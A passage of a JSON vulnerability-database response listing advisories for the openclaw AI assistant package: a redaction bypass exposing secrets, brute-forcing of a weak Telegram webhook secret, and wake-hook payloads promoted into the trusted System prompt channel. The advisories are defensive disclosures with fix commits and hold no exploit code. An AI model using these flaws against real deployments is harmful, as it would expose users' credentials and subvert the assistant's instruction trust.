9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-h5hg-h7rr-gpf3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ddf9-tnrt-r7f2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89927?format=json","vulnerability_id":"VCID-dfdk-dhwf-9yaj","summary":"OpenClaw: config.get redaction bypass through sourceConfig and runtimeConfig aliases\n## Summary\n\nconfig.get redaction bypass through sourceConfig and runtimeConfig aliases.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nAn authenticated gateway client with config read access could receive unredacted secrets through alias fields that survived redaction, including provider API keys, gateway auth material, and channel credentials.\n\n## Technical Details\n\nThe fix explicitly overwrites `sourceConfig` and `runtimeConfig` with the same redacted copies used for `resolved` and `config`, including the invalid-snapshot branch. Tests now cover both alias fields.\n\n## Fix\n\nThe issue was fixed in #66030. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `86734ef93a2f25063371b04f1946eb300548acd4`\n- PR: #66030\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43528","reference_id":"","reference_type":"","scores":[{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.24058","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00094","scoring_system":"epss","scoring_elements":"0.26208","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00094","scoring_system":"epss","scoring_elements":"0.26253","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43528"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/86734ef93a2f25063371b04f1946eb300548acd4","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/"}],"url":"https://github.com/openclaw/openclaw/commit/86734ef93a2f25063371b04f1946eb300548acd4"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66030","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66030"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8372-7vhw-cm6q","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8372-7vhw-cm6q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43528","reference_id":"CVE-2026-43528","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43528"},{"reference_url":"https://github.com/advisories/GHSA-8372-7vhw-cm6q","reference_id":"GHSA-8372-7vhw-cm6q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8372-7vhw-cm6q"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases","reference_id":"openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109967?format=json","purl":"pkg:npm/openclaw@2026.4.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"}],"aliases":["CVE-2026-43528","GHSA-8372-7vhw-cm6q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dfdk-dhwf-9yaj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90865?format=json","vulnerability_id":"VCID-djqx-bwuu-4uc1","summary":"OpenClaw: Telegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret\n## Summary\n\nTelegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nTelegram webhook auth previously rejected bad secrets but did not throttle repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7`.\n\n## Fix Commit(s)\n\n- `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7`\n\n## Release Process Note\n\n`2026.3.25` is the next planned OpenClaw release version in `package.json`. This advisory is being published ahead of that npm release so the draft is no longer blocked; once `2026.3.25` is published, the structured patched-version metadata will match the released artifact.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35628","reference_id":"","reference_type":"","scores":[{"value":"0.00071","scoring_system":"epss","scoring_elements":"0.21947","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00071","scoring_system":"epss","scoring_elements":"0.21996","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00071","scoring_system":"epss","scoring_elements":"0.2201","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35628"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c2c136ae9517ddd0789d742a0fdf4c10e8c729a7","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c2c136ae9517ddd0789d742a0fdf4c10e8c729a7"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vcx4-4qxg-mfp4","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vcx4-4qxg-mfp4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35628","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35628"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-telegram-webhook-rate-limiting","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-telegram-webhook-rate-limiting"},{"reference_url":"https://github.com/advisories/GHSA-vcx4-4qxg-mfp4","reference_id":"GHSA-vcx4-4qxg-mfp4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vcx4-4qxg-mfp4"}],"fixed_packages":[],"aliases":["CVE-2026-35628","GHSA-vcx4-4qxg-mfp4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-djqx-bwuu-4uc1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90015?format=json","vulnerability_id":"VCID-dmse-bb22-rkcj","summary":"OpenClaw: Authenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel\n## Impact\n\nAuthenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel.\n\nAn authenticated wake hook or mapped wake payload could be promoted into the trusted System prompt channel instead of an untrusted event.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @tdjackey for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf56-mccx-5f3f","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf56-mccx-5f3f"},{"reference_url":"https://github.com/advisories/GHSA-jf56-mccx-5f3f","reference_id":"GHSA-jf56-mccx-5f3f","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jf56-mccx-5f3f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["GHSA-jf56-mccx-5f3f"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dmse-bb22-rkcj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90803?format=json","vulnerability_id":"VCID-dsvn-dpb5-tfdz","summary":"Duplicate Advisory: OpenClaw: Unavailable local auth SecretRefs could fall through to remote credentials in local mode\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qvr7-g57c-mrc7. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.11 contains a credential fallback vulnerability where unavailable local gateway.auth.token and gateway.auth.password SecretRefs are treated as unset, allowing fallback to remote credentials in local mode. Attackers can exploit misconfigured local auth references to cause CLI and helper paths to select incorrect credential sources, potentially bypassing intended local authentication 